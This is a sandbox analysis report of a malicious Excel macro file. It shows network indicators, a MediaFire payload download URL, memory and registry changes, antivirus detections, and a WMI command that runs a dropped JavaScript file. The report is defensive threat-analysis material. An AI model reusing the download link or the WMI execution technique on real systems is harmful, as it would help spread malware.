Summary | ZeroBOX

new.xlsm

VBA_macro
Category FILE
Machine s1_win7_x6402
Started April 13, 2022, 1:31 p.m.
Completed April 13, 2022, 1:34 p.m.
Size 15.8KB
Type Microsoft Excel 2007+
MD5 191cab791281ce1bb8729e77bdce2576
SHA256 80e3a3bb8825e6cf42ca77ffe16f029c8c5582d2edf557a33ebd62ab2bc3605c
CRC32 5691697F
ssdeep 192:ZtYhEqBaFUlbVvevUqzQXpS02LCtHOalOuvfW7lRYLrJCc6rEultIYWAb+V2K4a2:PYOzUlM9z6pSoOaMuel1/rGYWA+Vwa2
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

IP Address Status Action
104.16.202.237 Active Moloch
164.124.101.2 Active Moloch
199.91.155.25 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49166 -> 199.91.155.25:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49167 -> 199.91.155.25:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 199.91.155.25:443 -> 192.168.56.102:49168 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49165 -> 104.16.202.237:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow: TLSv1 192.168.56.102:49165 -> 104.16.202.237:443
Issuer: C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Organization Validation Secure Server CA
Subject: C=US, ST=Texas, O=MediaFire, OU=IT, CN=*.mediafire.com
Fingerprint: 49:b6:4e:74:94:f0:7e:32:2b:c5:39:18:d0:a5:1e:69:4d:65:8f:b6

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
status: 1 return: 1 repeated: 0

GetComputerNameW

computer_name: TEST22-PC
status: 1 return: 1 repeated: 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

status: 1 return: 1 repeated: 0
request GET https://www.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0611c000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0611c000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b773000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 2316
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa7c7000
process_handle: 0xffffffffffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa7c7000
process_handle: 0xffffffffffffffff
status: 1 return: 0 repeated: 0
file C:\Users\test22\AppData\Local\Temp\~$new.xlsm
file C:\Users\Public\killlll.js
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000410
filepath: C:\Users\test22\AppData\Local\Temp\~$new.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$new.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
status: 1 return: 0 repeated: 0
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000000000000029c
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
status: 1 return: 0 repeated: 0
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000000000000029c
regkey_r: ProxyOverride
reg_type: 1 (REG_SZ)
value: 127.0.0.1:16107;
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
status: 1 return: 0 repeated: 0
Lionic Trojan.Script.Generic.4!c
MicroWorld-eScan Trojan.GenericKD.39468879
FireEye Trojan.GenericKD.39468879
ALYac Trojan.Downloader.XLS.Gen
Alibaba Trojan:Win32/MalDoc.ali1000158
Symantec CL.Downloader!gen87
ESET-NOD32 VBA/TrojanDropper.Agent.CNI
Avast Other:Malware-gen [Trj]
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.39468879
Ad-Aware Trojan.GenericKD.39468879
Emsisoft Trojan.GenericKD.39468879 (B)
McAfee-GW-Edition RDN/Powdow
GData Trojan.GenericKD.39468879
Avira VBS/Drop.Agent.jcaqi
MAX malware (ai score=86)
Antiy-AVL Trojan/Generic.ASMacro.30C16
Microsoft TrojanDownloader:O97M/EncDoc.JRSM!MTB
Arcabit Trojan.Generic.D25A3F4F
ViRobot XLS.Z.Agent.16198
Cynet Malicious (score: 99)
McAfee RDN/Powdow
Zoner Probably Heur.W97Obfuscated
Rising Malware.Obfus/VBA@AI.82 (VBA)
Fortinet VBA/Agent.XPW!tr
AVG Other:Malware-gen [Trj]
Time & API Arguments Status Return Repeated

IWbemServices_ExecMethod

inargs.CurrentDirectory: None
inargs.CommandLine: wscript C:\Users\Public\killlll.js
inargs.ProcessStartupInformation: None
outargs.ProcessId: 2316
outargs.ReturnValue: 0
flags: 0
method: Create
class: Win32_Process
status: 1 return: 0 repeated: 0